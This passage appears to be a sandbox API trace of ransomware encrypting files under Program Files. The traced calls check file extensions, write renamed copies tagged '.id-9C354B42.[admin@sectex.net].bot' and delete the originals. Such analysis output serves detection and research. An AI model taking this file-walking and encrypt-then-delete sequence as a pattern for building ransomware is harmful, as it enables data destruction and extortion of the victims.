	[0036.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.388] lstrlenW (lpString=".zip") returned 4
	[0036.388] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.388] lstrlenW (lpString=".rar") returned 4
	[0036.388] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.388] lstrlenW (lpString=".bz2") returned 4
	[0036.388] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.388] lstrlenW (lpString=".7z") returned 3
	[0036.388] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.388] lstrlenW (lpString=".dbf") returned 4
	[0036.388] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.388] lstrlenW (lpString=".1cd") returned 4
	[0036.388] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.388] lstrlenW (lpString=".jpg") returned 4
	[0036.388] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.389] lstrlenW (lpString=".doc") returned 4
	[0036.389] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.389] lstrlenW (lpString=".docx") returned 5
	[0036.389] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1
	[0036.389] lstrlenW (lpString=".pdf") returned 4
	[0036.389] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.389] lstrlenW (lpString=".xls") returned 4
	[0036.389] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.389] lstrlenW (lpString=".xlsx") returned 5
	[0036.389] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1
	[0036.389] lstrlenW (lpString=".ppt") returned 4
	[0036.389] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.389] lstrlenW (lpString=".zip") returned 4
	[0036.389] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.389] lstrlenW (lpString=".rar") returned 4
	[0036.389] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.389] lstrlenW (lpString=".bz2") returned 4
	[0036.389] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.389] lstrlenW (lpString=".7z") returned 3
	[0036.389] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.389] lstrlenW (lpString=".dbf") returned 4
	[0036.389] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.389] lstrlenW (lpString=".1cd") returned 4
	[0036.389] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0036.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76
	[0036.389] lstrlenW (lpString=".jpg") returned 4
	[0036.389] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0036.390] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0036.390] lstrlenW (lpString="symbols.xml") returned 11
	[0036.390] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0036.391] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=591) returned 1
	[0036.391] CloseHandle (hObject=0x19c) returned 1
	[0036.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml")) returned 0x20
	[0036.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.391] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0036.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76
	[0036.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76
	[0036.391] lstrlenW (lpString=".doc") returned 4
	[0036.391] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0036.391] lstrlenW (lpString=".docx") returned 5
	[0036.391] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1
	[0036.391] lstrlenW (lpString=".pdf") returned 4
	[0036.391] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0036.391] lstrlenW (lpString=".xls") returned 4
	[0036.391] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0036.391] lstrlenW (lpString=".xlsx") returned 5
	[0036.391] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1
	[0036.391] lstrlenW (lpString=".ppt") returned 4
	[0036.391] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0036.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76
	[0036.391] lstrlenW (lpString=".zip") returned 4
	[0036.391] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0036.391] lstrlenW (lpString=".rar") returned 4
	[0036.391] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.392] lstrlenW (lpString=".bz2") returned 4
	[0036.392] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.392] lstrlenW (lpString=".7z") returned 3
	[0036.392] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76
	[0036.392] lstrlenW (lpString=".dbf") returned 4
	[0036.392] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.396] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0036.396] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0036.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0036.399] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0036.858] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.858] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc
	[0036.859] GetLastError () returned 0x0
	[0036.859] ReadFile (in: hFile=0x1b8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x795, lpOverlapped=0x0) returned 1
	[0036.869] WriteFile (in: hFile=0x1bc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x7a0, lpOverlapped=0x0) returned 1
	[0036.870] ReadFile (in: hFile=0x1b8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0036.870] WriteFile (in: hFile=0x1bc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0036.870] SetEndOfFile (hFile=0x1bc) returned 1
	[0036.870] CloseHandle (hObject=0x1bc) returned 1
	[0036.874] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.874] SetEndOfFile (hFile=0x1b8) returned 1
	[0036.875] CloseHandle (hObject=0x1b8) returned 1
	[0036.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0036.875] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 1
	[0036.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.875] lstrlenW (lpString=".doc") returned 4
	[0036.875] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1
	[0036.875] lstrlenW (lpString=".docx") returned 5
	[0036.875] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1
	[0036.875] lstrlenW (lpString=".pdf") returned 4
	[0036.875] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1
	[0036.875] lstrlenW (lpString=".xls") returned 4
	[0036.875] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1
	[0036.875] lstrlenW (lpString=".xlsx") returned 5
	[0036.876] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1
	[0036.876] lstrlenW (lpString=".ppt") returned 4
	[0036.876] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1
	[0036.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.876] lstrlenW (lpString=".zip") returned 4
	[0036.876] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1
	[0036.876] lstrlenW (lpString=".rar") returned 4
	[0036.876] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1
	[0036.876] lstrlenW (lpString=".bz2") returned 4
	[0036.876] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1
	[0036.876] lstrlenW (lpString=".7z") returned 3
	[0036.876] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1
	[0036.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.876] lstrlenW (lpString=".dbf") returned 4
	[0036.876] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1
	[0036.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.876] lstrlenW (lpString=".1cd") returned 4
	[0036.876] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1
	[0036.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.876] lstrlenW (lpString=".jpg") returned 4
	[0036.876] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1
	[0036.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.876] lstrlenW (lpString=".doc") returned 4
	[0036.876] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1
	[0036.876] lstrlenW (lpString=".docx") returned 5
	[0036.876] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1
	[0036.876] lstrlenW (lpString=".pdf") returned 4
	[0036.876] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1
	[0036.876] lstrlenW (lpString=".xls") returned 4
	[0036.876] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1
	[0036.876] lstrlenW (lpString=".xlsx") returned 5
	[0036.876] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1
	[0036.876] lstrlenW (lpString=".ppt") returned 4
	[0036.877] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1
	[0036.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.877] lstrlenW (lpString=".zip") returned 4
	[0036.877] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1
	[0036.877] lstrlenW (lpString=".rar") returned 4
	[0036.877] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1
	[0036.877] lstrlenW (lpString=".bz2") returned 4
	[0036.877] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1
	[0036.877] lstrlenW (lpString=".7z") returned 3
	[0036.877] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1
	[0036.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.877] lstrlenW (lpString=".dbf") returned 4
	[0036.877] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1
	[0036.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.877] lstrlenW (lpString=".1cd") returned 4
	[0036.877] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1
	[0036.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71
	[0036.877] lstrlenW (lpString=".jpg") returned 4
	[0036.877] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1
	[0036.877] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.877] lstrlenW (lpString="InfoPathMUI.XML") returned 15
	[0036.877] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0036.878] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1231) returned 1
	[0036.878] CloseHandle (hObject=0x1b8) returned 1
	[0036.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 0x20
	[0036.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0036.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0036.878] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.878] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0036.883] GetLastError () returned 0x0
	[0036.883] ReadFile (in: hFile=0x1b8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x4cf, lpOverlapped=0x0) returned 1
	[0036.894] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x4d0, lpOverlapped=0x0) returned 1
	[0036.895] ReadFile (in: hFile=0x1b8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0036.895] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0036.895] SetEndOfFile (hFile=0x1c0) returned 1
	[0036.895] CloseHandle (hObject=0x1c0) returned 1
	[0036.896] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.896] SetEndOfFile (hFile=0x1b8) returned 1
	[0036.897] CloseHandle (hObject=0x1b8) returned 1
	[0036.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0036.897] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 1
	[0036.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.897] lstrlenW (lpString=".doc") returned 4
	[0036.897] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.897] lstrlenW (lpString=".docx") returned 5
	[0036.897] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0036.898] lstrlenW (lpString=".pdf") returned 4
	[0036.898] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.898] lstrlenW (lpString=".xls") returned 4
	[0036.898] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.898] lstrlenW (lpString=".xlsx") returned 5
	[0036.898] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0036.898] lstrlenW (lpString=".ppt") returned 4
	[0036.898] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.898] lstrlenW (lpString=".zip") returned 4
	[0036.898] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.898] lstrlenW (lpString=".rar") returned 4
	[0036.898] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.898] lstrlenW (lpString=".bz2") returned 4
	[0036.898] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.898] lstrlenW (lpString=".7z") returned 3
	[0036.898] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.898] lstrlenW (lpString=".dbf") returned 4
	[0036.898] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.898] lstrlenW (lpString=".1cd") returned 4
	[0036.898] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.898] lstrlenW (lpString=".jpg") returned 4
	[0036.898] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.898] lstrlenW (lpString=".doc") returned 4
	[0036.898] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.898] lstrlenW (lpString=".docx") returned 5
	[0036.898] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0036.898] lstrlenW (lpString=".pdf") returned 4
	[0036.898] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.899] lstrlenW (lpString=".xls") returned 4
	[0036.899] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.899] lstrlenW (lpString=".xlsx") returned 5
	[0036.899] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0036.899] lstrlenW (lpString=".ppt") returned 4
	[0036.899] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.899] lstrlenW (lpString=".zip") returned 4
	[0036.899] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.899] lstrlenW (lpString=".rar") returned 4
	[0036.899] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.899] lstrlenW (lpString=".bz2") returned 4
	[0036.899] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.899] lstrlenW (lpString=".7z") returned 3
	[0036.899] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.899] lstrlenW (lpString=".dbf") returned 4
	[0036.899] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.899] lstrlenW (lpString=".1cd") returned 4
	[0036.899] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110
	[0036.899] lstrlenW (lpString=".jpg") returned 4
	[0036.899] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.899] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.899] lstrlenW (lpString="BRANDING.XML") returned 12
	[0036.899] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0037.750] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=596341) returned 1
	[0037.750] CloseHandle (hObject=0x1b0) returned 1
	[0037.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 0x20
